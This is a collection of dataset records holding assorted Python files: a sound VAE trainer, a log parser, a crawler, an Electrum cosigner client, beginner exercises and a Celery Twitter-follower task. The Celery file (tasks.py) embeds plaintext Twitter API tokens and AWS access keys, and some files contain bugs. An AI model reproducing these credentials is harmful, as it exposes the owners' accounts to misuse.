device=\"cuda\"):\n # prepare cuda device\n self.device = torch.device(device if torch.cuda.is_available() else \"cpu\")\n #self.device = torch.device(\"cpu\")\n # prepare dataset\n self.dataset = SoundDataset(transform=transforms.ToTensor())\n # define model\n self.model = VAE_without_label(self.dataset.data_size, dim_z).to(self.device)\n # define optimizer\n self.optimizer = optim.Adam(self.model.parameters(), lr=1e-3)\n self.dim_z = dim_z\n \n #def __del__(self):\n # self.save_weight()\n \n def load(self, key):\n self.dataset.load(\"../data/sounds/raw/sub1\", key, 0)\n self.dataset.load(\"../data/sounds/raw/sub2\", key, 1)\n self.dataset.load(\"../data/sounds/raw/sub3\", key, 2)\n self.dataset.load(\"../data/sounds/raw/sub4\", key, 3)\n self.dataset.load(\"../data/sounds/raw/sub5\", key, 4)\n self.dataset.load(\"../data/sounds/raw/sub6\", key, 5)\n self.dataset.load(\"../data/sounds/raw/sub7\", key, 6)\n self.dataset.load(\"../data/sounds/raw/sub8\", key, 7)\n self.dataset.load(\"../data/sounds/raw/sub9\", key, 8)\n self.dataset.load(\"../data/sounds/raw/sub10\", key, 9)\n self.dataset.load(\"../data/sounds/raw/sub11\", key, 10)\n self.dataset.normalize()\n \n def train(self, epoch, max_epoch):\n # train mode\n self.model.train()\n train_loss = 0\n for batch_idx, (x, y) in enumerate(self.train_loader):\n x = x.to(self.device)\n # zero the parameter gradients\n self.optimizer.zero_grad()\n\n # forward\n rec_x, mu, logvar = self.model(x)\n loss = self.model.loss_function_vae(rec_x, x, mu, logvar)\n # backward\n loss.backward()\n # update the parameter\n self.optimizer.step()\n # logging\n train_loss += loss.item()\n if batch_idx % 1 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(x), len(self.train_loader.dataset),\n 100. * batch_idx / len(self.train_loader),\n loss.item() / len(x)))\n \n train_loss /= len(self.train_loader.dataset)\n print('====> Epoch: {} Average loss: {:.4f}'.format(epoch, train_loss))\n \n return train_loss\n\n def valid(self, epoch):\n # test mode\n self.model.eval()\n valid_loss = 0\n # test mode\n with torch.no_grad():\n for i, (x, y) in enumerate(self.valid_loader):\n x = x.to(self.device)\n rec_x, mu, logvar = self.model.valid(x)\n loss = self.model.loss_function_vae(rec_x, x, mu, logvar)\n valid_loss += loss.item()\n\n valid_loss /= len(self.valid_loader.dataset)\n print('====> Validation set loss: {:.4f}'.format(valid_loss))\n \n return valid_loss\n \n def auto_train(self, max_epoch, save_path = '../result/VAE/model'):\n train_set, valid_set = torch.utils.data.random_split(self.dataset, [int(len(self.dataset)*0.8), len(self.dataset) - int(len(self.dataset)*0.8)])\n self.train_loader = torch.utils.data.DataLoader(train_set,batch_size=10,shuffle=True)\n self.valid_loader = torch.utils.data.DataLoader(valid_set,batch_size=10,shuffle=True)\n \n train_loss = []\n valid_loss = []\n for epoch in range(1,max_epoch):\n t_loss = self.train(epoch, max_epoch)\n v_loss = self.valid(epoch)\n train_loss.append(t_loss)\n valid_loss.append(v_loss)\n # plot result\n fig, ax = plt.subplots(1,1,figsize=(8, 4))\n ax.set_title('Loss')\n ax.set_xlabel('Epochs')\n ax.set_ylabel('Loss')\n ax.plot(range(1,max_epoch),train_loss,label=\"train\")\n ax.plot(range(1,max_epoch),valid_loss,label=\"validation\")\n \n plt.legend()\n plt.tight_layout()\n plt.savefig(save_path+'/loss.png')\n plt.close()\n \n def save_weight(self, save_path = '../result/VAE/model/vae'):\n torch.save(self.model.state_dict(), save_path)\n \n def load_weight(self, load_path = '../result/VAE/model/vae'):\n self.model.load_state_dict(torch.load(load_path))\n \n \n def plot_z(self, save_path='../result/VAE/model/result.png'):\n # print z all data\n loader = torch.utils.data.DataLoader(self.dataset,batch_size=len(self.dataset),shuffle=False)\n all_z = []\n all_ans = []\n self.model.eval()\n with torch.no_grad():\n for i, (data, ans) in enumerate(loader):\n data = data.to(self.device)\n _, mu, logvar = self.model.forward(data)\n all_z = np.append(all_z, mu.to('cpu').clone().numpy())\n all_ans = np.append(all_ans, ans.to('cpu').clone().numpy())\n\n all_z = np.array(all_z).reshape(-1, self.model.z_shape)\n all_ans = np.array(all_ans).reshape(-1)\n \n # LDA\n self.lda = LDA(n_components = 2)\n self.lda.fit(all_z, all_ans)\n lda_z = self.lda.transform(all_z)\n lda_z = lda_z.transpose()\n \n z_xrange = [np.min(lda_z[0]), np.max(lda_z[0])]\n z_yrange = [np.min(lda_z[1]), np.max(lda_z[1])] \n plot_z(lda_z[0], lda_z[1], all_ans, \"z map\", save_path.split('.png')[0] + '_LDA.png', z_xrange, z_yrange)\n plot_z_each(lda_z, all_ans, self.dataset.filenames, '../data/succeed_list.csv', \"z map\",\n save_path.split('.png')[0] + '_LDA_each.png', z_xrange, z_yrange)\n \n # ICA\n self.ica = FastICA(n_components = 2)\n self.ica.fit(all_z)\n ica_z = self.ica.transform(all_z)\n ica_z = ica_z.transpose()\n \n z_xrange = [np.min(ica_z[0]), np.max(ica_z[0])]\n z_yrange = [np.min(ica_z[1]), np.max(ica_z[1])] \n plot_z(ica_z[0], ica_z[1], all_ans, \"z map\", save_path.split('.png')[0] + '_ICA.png', z_xrange, z_yrange)\n plot_z_each(ica_z, all_ans, self.dataset.filenames, '../data/succeed_list.csv', \"z map\",\n save_path.split('.png')[0] + '_ICA_each.png', z_xrange, z_yrange)\n \n def reconstruct(self, save_path = '../result/VAE/reconstructed_sounds'):\n loader = torch.utils.data.DataLoader(self.dataset,batch_size=1,shuffle=False)\n self.model.eval()\n with torch.no_grad():\n for i, (x, y) in enumerate(loader):\n x = x.to(self.device)\n recon_x, _, _ = self.model.forward(x)\n recon_x = recon_x.to('cpu').clone().numpy()\n x = x.to('cpu').clone().numpy()\n x = x.reshape(3, -1)\n recon_x = recon_x.reshape(3, -1)\n # to png\n fig, ax = plt.subplots(2,3,figsize=(24, 12))\n ax[0][0].set_title('L')\n ax[0][1].set_title('C')\n ax[0][2].set_title('R')\n ax[1][0].set_title('reconstructed L')\n ax[1][1].set_title('reconstructed C')\n ax[1][2].set_title('reconstructed R')\n time = range(len(x[0]))\n for j in range(3):\n ax[0][j].set_ylim(0, 1)\n ax[1][j].set_ylim(0, 1)\n ax[0][j].plot(time, x[j], linewidth = 1)\n ax[1][j].plot(time, recon_x[j], linewidth = 1)\n plt.tight_layout()\n plt.savefig(save_path + '/' + self.dataset.filenames[i].split('.csv')[0] + '.png')\n plt.close()\n # to csv\n save_data = pd.DataFrame(data = recon_x)\n save_data.to_csv(save_path + '/'+ self.dataset.filenames[i], index = False)\n\n\ndef plot_z(x, y, ans, title, save_path, xrange=None, yrange=None):\n plt.figure(figsize=(8, 8))\n if xrange is not None:\n plt.xlim(xrange[0], xrange[1])\n if yrange is not None:\n plt.ylim(yrange[0], yrange[1])\n idxs, labels, colors, markers = ans2index_label_color_marker(ans)\n for i, (label, color, marker) in enumerate(zip(labels,colors,markers)):\n plt.scatter(x[idxs[i]:idxs[i+1]], y[idxs[i]:idxs[i+1]], label=label, s=10, color=color, marker=marker)\n plt.title(title)\n plt.legend()\n plt.tight_layout()\n plt.savefig(save_path)\n plt.close()\n\n\ndef plot_z_each(data, ans, names, sf_filepath, title, save_path, xrange=None, yrange=None):\n data_list = results_list(data, ans, names)\n data_list.classify(sf_filepath)\n \n # the number of the classes == 11\n fig, ax = plt.subplots(4, 3, figsize=(24,32))\n for i in range(0,12):\n ax[i//3][i%3].set_title(str(i), fontsize=20)\n if xrange is not None:\n for i in range(0,12):\n ax[i//3][i%3].set_xlim(xrange[0], xrange[1])\n if yrange is not None:\n for i in range(1,12):\n ax[i//3][i%3].set_ylim(yrange[0], yrange[1])\n \n idxs, labels, colors, markers = ans2index_label_color_marker(ans)\n for i, (label, color, marker) in enumerate(zip(labels,colors,markers)):\n ax[0][0].scatter(data[0,idxs[i]:idxs[i+1]], data[1,idxs[i]:idxs[i+1]], label=label, s=20, color=color, marker=marker)\n ax[0][0].legend()\n ax[0][0].set_title(title, fontsize=20)\n \n for i, (result, label, color) in enumerate(zip(data_list,labels,colors)):\n if len(result.success) > 0:\n ax[(i+1)//3][(i+1)%3].scatter(result.success[:,0], result.success[:,1], label=label, s=20, color=color, marker='.')\n if len(result.false) > 0:\n ax[(i+1)//3][(i+1)%3].scatter(result.false[:,0], result.false[:,1], label=label, s=20, color=color, marker='x')\n ax[(i+1)//3][(i+1)%3].legend()\n\n plt.tight_layout()\n plt.savefig(save_path)\n plt.close()\n\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/drive/vae')\nvae.load('drive')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/drive')\nvae.plot_z(save_path = '../result/VAE_without_label/drive/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/drive/vae')\ndel vae\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/block/vae')\nvae.load('block')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/block')\nvae.plot_z(save_path = '../result/VAE_without_label/block/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/block/vae')\ndel vae\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/push/vae')\nvae.load('push')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/push')\nvae.plot_z(save_path = '../result/VAE_without_label/push/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/push/vae')\ndel vae\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/stop/vae')\nvae.load('stop')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/stop')\nvae.plot_z(save_path = '../result/VAE_without_label/stop/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/stop/vae')\ndel vae\n\nvae = VAE_without_label_trainer()\nvae.load_weight(load_path = '../result/VAE_without_label/flick/vae')\nvae.load('flick')\n#vae.auto_train(1000, save_path = '../result/VAE_without_label/flick')\nvae.plot_z(save_path = '../result/VAE_without_label/flick/z_map.png')\n#vae.reconstruct()\n#vae.save_weight(save_path = '../result/VAE_without_label/flick/vae')\ndel vae\n\n\n","sub_path":"src/vae_without_label.py","file_name":"vae_without_label.py","file_ext":"py","file_size_in_byte":15617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"522029285","text":"import re\r\n\r\n#[Fri Oct 28 05:43:38.294803 2016] [ssl:warn] [pid 4500:tid 304] AH01909: www.example.com:443:0 server certificate does NOT include an ID which matches the server name\r\n\r\np=r'^\\[(?P[a-zA-z]{3}) (?P[a-zA-z]{3}) (?P[\\d]{1,2}) (?P\\b[\\d:\\.]+\\b) (?P[\\d]{4})\\] \\[(?P[\\w:]+)\\] \\[(?P[\\w: ]+)\\] (?P.+)$'\r\n\r\nreo = re.compile(p)\r\nfh = open('error.log')\r\n\r\ndata ={}\r\n\r\nfor line in fh:\r\n m = reo.search(line)\r\n if m:\r\n error_list = data.get(m.group('error'), None)\r\n if not error_list:\r\n data[m.group('error')]=[m.group('msg')]\r\n else:\r\n data[m.group('error')].append(m.group('msg'))\r\n\r\nprint (data.keys())\r\n#print data['core:warn']\r\nfor i in data.keys():\r\n print(i, len(data[i]))\r\n\t\r\nfh.close()\r\n","sub_path":"logparser.py","file_name":"logparser.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515545368","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\n\ndef get_source(url):\n \"\"\" Return HTML source of requested url\"\"\"\n try:\n req = urllib.request.Request(url)\n with urllib.request.urlopen(req) as response:\n page_source = response.read()\n return page_source\n except:\n print(\"Error Opening url: %s\" % url)\n\n\ndef get_subcat(site_url):\n \"\"\" Return list of urls to all subcategories in the site\"\"\"\n selector = \".w25p.pb10 > a\" # CSS Selector for Subcategories in page\n page_source = get_source(site_url)\n\n # Parse html source DOM\n html_DOM = BeautifulSoup(page_source, \"html.parser\")\n # Save all href attributes in a list\n subcats = [a.get('href') for a in html_DOM.select(selector)]\n\n return subcats\n\n\ndef get_subcat_pages(subcat_url):\n \"\"\" Return a url list of subcategory product pages divided by pagination \"\"\"\n page_source = get_source(subcat_url)\n html_DOM = BeautifulSoup(page_source, \"html.parser\")\n\n # CSS Selector for pagination buttons in products page\n selector = \".paging-wrapper a.paging.paging-color\"\n pages = html_DOM.select(selector)\n\n # Check if there is no pagination\n if not pages:\n return [subcat_url]\n\n # Get the last page index in pagination\n last_page_index = int(pages[-1].get_text())\n\n # Generate URL for paginated products pages\n subcat_pages = [\"%spage.%d/\" % (subcat_url, i) for i in range(1, last_page_index + 1)]\n return subcat_pages\n\n\ndef get_page_items(page_url):\n \"\"\" Return a list of product url\"\"\"\n page_source = get_source(page_url)\n if not page_source: return\n html_DOM = BeautifulSoup(page_source, \"html.parser\")\n\n # CSS Selectors for Item div, title, price, url\n item_selector = \"div.item\"\n item_url_selector = \"a.item-title-text\"\n item_title_selector = \"a.item-title-text\"\n item_price_selector = \"span.item-price\"\n\n # Select all Item divs\n items = html_DOM.select(item_selector)\n\n # Get Title, Price, and URL of the products\n items_detail = [(item.select(item_title_selector)[0].get_text(),\n item.select(item_price_selector)[0].get_text(),\n item.select(item_url_selector)[0].get('href')) for item in items]\n\n return items_detail\n\n\nif __name__ == \"__main__\":\n\n site_url = \"http://meghdadit.com/\"\n output_url = \"./out.txt\"\n\n # Open output file\n out = open(output_url, 'w', encoding='utf-8')\n\n # Get subcategories\n subcats = get_subcat(site_url)\n for subcat in subcats:\n if subcat:\n print(\"*** Crawling Subcategory: %s \\n\" % subcat)\n\n # Get product pages for subcategories\n pages = get_subcat_pages(subcat)\n for page in pages:\n print(\"\\n****** Crawling Product Page: %s \\n\" % page)\n items = get_page_items(page)\n if items:\n\n # Get items in product page\n for title, price, url in items:\n print(\"%s, %s\" % (title, price))\n out.write(\"%s, %s \\n\" % (price, url))\n\n out.close()","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"79569575","text":"from .tools import TrustedCoinException, ErrorConnectingServer\n\nfrom electrum.network import Network\nfrom electrum import version, constants\nfrom electrum.logging import Logger\nfrom urllib.parse import urljoin\nfrom aiohttp import ClientResponse\n\n\nclass TrustedCoinCosignerClient(Logger):\n def __init__(self, user_agent=None):\n self.debug = False\n self.user_agent = user_agent\n Logger.__init__(self)\n\n async def handle_response(self, resp: ClientResponse):\n if resp.status != 200:\n try:\n r = await resp.json()\n message = r['message']\n except:\n message = await resp.text()\n\n raise TrustedCoinException(message, resp.status)\n try:\n return await resp.json()\n except:\n return await resp.text()\n\n #\n def send_request(self, method, relative_url, data=None, *, timeout=None, server_address=None):\n network = Network.get_instance()\n if not network:\n raise ErrorConnectingServer('You are offline.')\n url = urljoin(server_address, relative_url)\n if self.debug:\n self.logger.info(f'<-- {method} {url} {data}')\n headers = {}\n if self.user_agent:\n headers['user-agent'] = self.user_agent\n\n try:\n if method == 'get':\n response = Network.send_http_on_proxy(method, url,\n params=data,\n headers=headers,\n on_finish=self.handle_response,\n timeout=timeout)\n elif method == 'post':\n response = Network.send_http_on_proxy(method, url,\n json=data,\n headers=headers,\n on_finish=self.handle_response,\n timeout=timeout)\n else:\n assert False\n except TrustedCoinException:\n raise\n except Exception as e:\n raise ErrorConnectingServer(e)\n else:\n if self.debug:\n self.logger.info(f'--> {response}')\n return response\n\n def get_terms_of_service(self, server_address=None, billing_plan='electrum-per-tx-otp', ):\n \"\"\"\n 获取价格\n :param server_address:\n :param billing_plan: the plan to return the terms for\n \"\"\"\n payload = {'billing_plan': billing_plan, 'is_test': int(constants.net.TESTNET)}\n return self.send_request('get', 'terms', payload, timeout=600, server_address=server_address)\n\n def create(self, server_address, xpub1, xpub2, email, type_of_service):\n\n \"\"\"\n 创建钱包\n :param server_address:\n :param type_of_service:\n :param xpub1:\n :param xpub2:\n :param email:\n :return:\n \"\"\"\n payload = {\n 'email_address': email,\n 'first_xpub': xpub1,\n 'secondary_xpub': xpub2,\n 'is_test': int(constants.net.TESTNET),\n 'type_of_service': type_of_service\n }\n\n return self.send_request('post', 'create_wallet', payload, timeout=600, server_address=server_address)\n\n def sign(self, server_address, short_id, raw_tx, otp):\n \"\"\"\n\n :param server_address:\n :param short_id:\n :param raw_tx:\n :param otp:\n :return:\n \"\"\"\n\n payload = {\n 'short_id': short_id,\n 'raw_tx': raw_tx,\n 'otp': otp,\n 'is_test': int(constants.net.TESTNET)\n\n }\n return self.send_request('post', 'sign', payload, timeout=600, server_address=server_address)\n\n def auth(self, server_address, short_id, otp):\n \"\"\"\n 身份验证\n :param server_address:\n :param short_id:\n :param otp:\n :return:\n \"\"\"\n payload = {\n 'short_id': short_id,\n 'otp': otp,\n 'is_test': int(constants.net.TESTNET)\n\n }\n return self.send_request('get', 'check_code', payload, timeout=600, server_address=server_address)\n\n def get_billing(self, server_address, short_id):\n \"\"\"\n 获取账单信息\n :param server_address:\n :param short_id:\n :return:\n \"\"\"\n payload = {\n 'short_id': short_id\n\n }\n return self.send_request('get', 'get_billing', payload, timeout=600, server_address=server_address)\n\n\ntc_requests = TrustedCoinCosignerClient(user_agent=\"Electrum/\" + version.ELECTRUM_VERSION)\n","sub_path":"electrum/plugins/tc/tc_requests.py","file_name":"tc_requests.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"554545324","text":"\r\ndef mean(data):\r\n return sum(data)/len(data)\r\n\r\n\r\ndef median(sample):\r\n n = len(sample)\r\n index = n // 2\r\n if n % 2:\r\n return sorted(sample)[index]\r\n return sum(sorted(sample)[index - 1:index + 1]) / 2\r\n\r\n\r\ndef mode(arr):\r\n counts = []\r\n for i in arr:\r\n counts.append(arr.count(i))\r\n if max(counts) > 1:\r\n print(arr[counts.index(max(counts))])\r\n else:\r\n print(min(arr))\r\n\r\nN = int(input().strip())\r\n\r\narr = [int(i) for i in input().strip().split(' ')]\r\n\r\nm = mean(arr)\r\nprint(m)\r\n\r\np = median(arr)\r\nprint(p)\r\n\r\nr = mode(arr)\r\n","sub_path":"MeanMedianMode.py","file_name":"MeanMedianMode.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"227224859","text":"names = ['kobe' , 'embiid' , 'jordan']\nfor name in names:\n print( \"Would you like to have dinner with me ? \" + name)\n \nprint(\"Kobe cannot attend dinner\")\nnames[0] = 'james'\n\n\n\nprint(\"now ,I have a bigger restaurant , I d like to invite more friends\")\nnames.insert(0,'robert')\nnames.insert(2,'george')\nnames.append('michial')\n\nfor name in names:\n print( \"Would you like to have dinner with me ? \" + name)\n","sub_path":"python代码及学习笔记/3.list/3.6.py","file_name":"3.6.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"205438621","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 26 14:47:26 2019\n@author: majdoor\n\"\"\"\n\n\n\nclass Node:\n \n def __init__(self,data):\n self.data = data\n self.next = None\n self.prv = None\n\nclass CLL:\n \n def __init__(self):\n self.head = None\n \n def insertNode(self,data):\n head = self.head\n while(head.next!=self.head):\n head = head.next\n loc = Node(data)\n loc.next = self.head\n loc.prv = self.head.prv\n head.next = loc\n self.head.prv = loc\n \n def printNode(self):\n head= self.head\n while(head.next != self.head):\n print(head.data)\n head = head.next\n \n def printRvNode(self):\n head = self.head\n while(head.prv != self.head):\n print(head.data)\n head = head.prv\n \n def deleteNode(self,data):\n head = self.head\n if(head.data == data):\n self.head = head.next\n self.prv = head.prv\n else:\n while(head.next != self.head):\n if(head.data == data):\n head.prv.next = head.next\n head.next.prv = head.prv\n break\n head = head.next\n \n \nif __name__ == \"__main__\":\n node = Node(1)\n cll = CLL()\n node.next = node\n node.prv = node\n cll.head = node\n for i in range(0,10):\n cll.insertNode(i)\n cll.deleteNode(2)\n cll.printNode()\n \n \n ","sub_path":"linked-list/circularLinkedList.py","file_name":"circularLinkedList.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162771769","text":"# filename is f. + number 1 to 10000 (or better way list of all file in directory)\n\n# import directory module to work in any Operation System \nfrom os import listdir \nfrom os.path import isfile\n\n# import regex\nimport re \n\n# clean OUTPUT file to be new file before process\noutputfile = open('OUTPUT', 'w')\noutputfile.close()\n\n# store file in list \nfiles = []\n\n# describe file pattern\nfile_pattern = re.compile(\"^f\\.[1-9][0-9]*\")\n\n# list all files in this directory to check\nfor f in listdir():\n\n# check isfile and compare with file pattern\n if(isfile(f) and file_pattern.match(f)):\n files.append(f)\n\n# sort file name by numerically\nfiles.sort(key=lambda text: int(text.split('.')[1]))\n\n# read the file\nfor filename in files:\n\n# open file name by name\n file = open(filename, 'r') \n \n# initialize flag for checking Oxygen is read\n O_isRead = {} \n O_isRead['O1'] = False\n O_isRead['O2'] = False\n \n# initialize storage of coordinates of Oxygen\n coordinate_x = {}\n coordinate_y = {}\n coordinate_z = {}\n \n# split the name of file by . and get time sequence number\n time_seq = filename.split('.')[-1]\n \n# read file line by line \n lines = file.readlines()\n \n# finished reading. close file\n file.close()\n \n# make program read from bottom by reverse list of lines. because oxygen atoms genelly store in bottom lines \n lines.reverse()\n \n# seperate each paragraph with space to substring\n for line in lines:\n substr = line.split()\n \n# if O1 and O2 in this file is read. skip the rest of this file\n if(O_isRead['O1'] and O_isRead['O2']):\n break\n \n# check if the line should start with 'ATOM'\n if(substr[0] == 'ATOM'):\n \n# using regex to check what atom on this line, considering O1 and O2\n O1_2_pattern = re.compile('O[1-2]')\n if(bool(O1_2_pattern.match(substr[2]))):\n \n# store the Oxygen that found\n coordinate_x[substr[2]] = substr[5]\n coordinate_y[substr[2]] = substr[6]\n coordinate_z[substr[2]] = substr[7]\n \n# mark as read in Oxygen atom \n O_isRead[substr[2]] = True\n \n# write in the text file, open the text file (after mode) \n# open text file \n outputfile = open('OUTPUT', 'a')\n \n# write name(time sequence number), O atom(1 or 2), coordinates(x, y, z)\n# write O1 and O2\n for i in ['1','2']:\n data_towrite = time_seq + '\\tO' + i + '\\t' \\\n + coordinate_x['O' + i] + '\\t' \\\n + coordinate_y['O' + i] + '\\t' \\\n + coordinate_z['O' + i] + '\\t\\n'\n outputfile.write(data_towrite) \n \n# print the current process that currently writing. \n print('step ' + data_towrite[:-1])\n \n# end file and reset mark as read in o1 and o2\n outputfile.close()\n \n# loop it, read the new file","sub_path":"extractoxygen.py","file_name":"extractoxygen.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"530207560","text":"# Wap to sumof digits of a number\n\nn = int(input(\"Enter the given numbers\"))\n\ntotal =0\n\nwhile(n>0):\n dig = n%10\n total=total+dig\n n=n//10\n\nprint(\"the total sum of digit:\",total)","sub_path":"NareshExamples/SumOfDigits.py","file_name":"SumOfDigits.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"41956463","text":"################EXTERNAL LIBRARY IMPORTS################\nfrom celery import Celery\nimport tweepy\nfrom tweepy import api\nimport ast\nimport json\nimport string\nimport time\nimport boto\nfrom boto.s3.connection import S3Connection\nfrom boto.s3.key import Key\n\n########################################################\n\napp = Celery()\napp.config_from_object(\"celery_settings\")\n\ndef handler(signum, frame):\n \n sys.exit(1)\n\n@app.task\ndef hello(): \n signal.signal(signal.SIGTERM, handler)\n \n # Authentication details. To obtain these visit dev.twitter.com\n consumer_key = '4DKCMVCkPWZW2MxUjz7aERJ4Q'\n consumer_secret = 'XKUjNbLDfbBbumSbcAhxvx55W2AQp4sufFqUoWYMHwmKIOMsum'\n access_token = '271096886-DF5s6ZpjzWUN0Ibf6Sf8wUyM9QhMkBMSGAh7mRnm'\n access_token_secret = 'WoIYrEZeDxiiAZfqrgzJDuYbL1c6bs6ooa8eVX42AA6tq'\n \n follower_array = []\n \n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n \n conn = S3Connection('AKIAJW4YOLS4PHPK5CLQ', 'JUPbDU2QXJQT24Z075gthokQs9sgnh79OoHKmr7d')\n mybucket = \"ddbucketsfe\"\n ddbucketsfe = conn.get_bucket(mybucket)\t\n b = conn.get_bucket(ddbucketsfe) # substitute your bucket name here\n k = Key(b)\n k.key = 'twitter_followers'\n \n api = tweepy.API(auth,wait_on_rate_limit=True)\n while True:\n temp = api.followers(screen_name = '@DeloitteDIGI_SA',count=20)\n for user in temp:\n if user.screen_name.encode('utf-8') not in follower_array:\n follower_array.append(user.screen_name.encode('utf-8'))\n k.set_contents_from_string(str(follower_array))\n time.sleep (60)\n \n \n\n\n\n\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"129550199","text":"import time\r\n\r\ndef montaMatriz(vet,c):\r\n\r\n\r\n mat = [[0 for col in range(c+1)] for lin in range(len(vet))]\r\n for indicelin, linha in enumerate(mat):\r\n for indicecol, coluna in enumerate(linha):\r\n #preenche a 1ª coluna com vdd\r\n linha[0]=1\r\n #linha inicial tem conceito diferente\r\n if indicelin==0:\r\n if indicecol==vet[indicelin]:\r\n mat[indicelin][indicecol]=1\r\n #a partir da segunda linha:\r\n else:\r\n if indicecol < vet[indicelin]:\r\n mat[indicelin][indicecol]=mat[indicelin-1][indicecol]\r\n else:\r\n #se o de cima for verdadeiro o termo recebe verdadeiro\r\n if mat[indicelin-1][indicecol] == 1:\r\n mat[indicelin][indicecol] = 1\r\n else:\r\n #se o de cima for falso sobe um e volta a qtd de termos representante da linha\r\n mat[indicelin][indicecol] = mat[indicelin-1][indicecol - vet[indicelin]]\r\n\r\n for i in mat:\r\n print(i, \"\\n\")\r\n return mat\r\n\r\ndef achaCombinacao(mat,v,c):\r\n aux=0\r\n for linha,i in enumerate(mat):\r\n for coluna, j in enumerate(i):\r\n if mat[linha][coluna]==1:\r\n aux=1\r\n else:\r\n aux=0\r\n\r\n if aux==1:\r\n print(\"Há subconjunto\")\r\n else:\r\n print('Não há subconjunto')\r\ninicio2 = time.time()\r\nv=[2,3,5,7,10,15]\r\nc=17\r\nmat = montaMatriz(v,c)\r\nachaCombinacao(mat,v,c)\r\nfim2 = time.time()\r\nprint(\"Tempo dinamico:\", fim2-inicio2)\r\n","sub_path":"2020_1/analise_de_algoritmo/correcaoa1/matheus_jesus/AnaliseDeAlgoritmo/subsetsum_progamacao_dinamica.py","file_name":"subsetsum_progamacao_dinamica.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"260133240","text":"\"\"\" Compiled: 2020-09-18 10:38:52 \"\"\"\n\n#__src_file__ = \"extensions/IntegratedWorkbench/./etc/FViewCallbacks.py\"\n\"\"\"-------------------------------------------------------------------------------------------------------\nMODULE\n FViewCallbacks\n\n (c) Copyright 2014 SunGard FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n FUiEventCallback functions for views.\n-------------------------------------------------------------------------------------------------------\"\"\"\nimport FIntegratedWorkbench\nimport ViewLauncher\nimport acm\n\nfrom FIntegratedWorkbenchLogging import creationLogger\nfrom FPanelCreator import PanelCreator\nfrom FViewCreator import GetPanels\nfrom FViewUtils import ViewParameterSettings\n\nVIEW_KEY = 'integratedWorkbenchView'\n\n\ndef OnFrameCreate(eii):\n application = eii.ExtensionObject()\n RegisterViewPanels(application)\n\ndef OnSavingWorkbook(eii):\n workbook = eii.ExtensionObject().StoredWorkbook()\n frame = eii.Parameter('Frame')\n view = FIntegratedWorkbench.GetView(frame)\n if view:\n workbook.ToArchive(VIEW_KEY, view.Name())\n\ndef OnWorkbookCreate(eii):\n\n def ViewName(workbook):\n viewName = workbook.FromArchive(VIEW_KEY)\n if viewName is None:\n # backwards compatibility\n viewName = ViewNameFromAddInfo(workbook)\n return viewName\n\n def ViewNameFromAddInfo(workbook):\n try:\n return workbook.AdditionalInfo().View()\n except Exception:\n return None\n\n workbook = eii.ExtensionObject().StoredSourceWorkbook()\n if workbook is not None:\n viewName = ViewName(workbook)\n if viewName is not None:\n frame = eii.Parameter('Frame')\n ViewLauncher.LaunchViewFromExistingApplication(viewName, frame)\n\ndef RegisterViewPanels(application):\n for settings in GetViewPanels(application):\n RegisterPanel(settings, application)\n\ndef RegisterPanel(settings, application):\n try:\n creator = PanelCreator.FromSettings(None, settings)\n createFunction = creator.CreateFunction() \n createFunctionName = ''.join((settings.Name(), 'CreationFunction'))\n application.RegisterDockWindowType(settings.Name(), '.'.join((__name__, createFunctionName)))\n setattr(__import__(__name__), createFunctionName, createFunction)\n except Exception as e:\n creationLogger.debug('Error while trying to register panel on view: %s', e)\n\ndef GetViewPanels(application):\n for settings in ViewParameterSettings():\n if application.Name() == settings.Application():\n for panel in GetPanels(settings):\n yield panel","sub_path":"Extensions/_integrated_workbench_py/FPythonCode/FViewCallbacks.py","file_name":"FViewCallbacks.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 